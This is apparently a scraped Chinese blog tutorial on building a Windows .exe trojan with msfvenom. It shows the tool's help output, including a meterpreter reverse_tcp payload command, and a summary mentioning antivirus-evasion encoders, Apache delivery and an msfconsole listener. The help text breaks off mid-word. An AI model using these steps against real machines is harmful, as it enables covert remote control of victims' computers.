使用msfvenom制作exe木马文件
1. msfvenom
msfvenom是msfpayload,msfencode的结合体。使用msfvenom制作木马的思路是,木马在目标机上执行后,向本机发送信息,而本机则需要开启监听状态,收到信息后则进行连接。
2. 制作木马
msfvenom制作木马需要的参数很多:
root@kali:~# msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
Options:
-l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
--list-options List --payload <value>'s standard, advanced and evasion options
-f, --format <format> Output format (use --list formats to list)
-e, --encoder <encoder> The encoder to use (use --list encoders to list)
--service-name <value> The service name to use when generating a service binary
--sec-name <value> The new sect

本文介绍了如何使用msfvenom工具生成Windows平台的meterpreter反向TCP木马,并通过设置编码器和参数来提高免杀率。生成的木马文件以.exe格式保存,并通过Apache服务器提供下载。在Kali Linux中,通过msfconsole开启监听,等待目标机运行木马后获取shell。

1563

被折叠的 条评论
为什么被折叠?



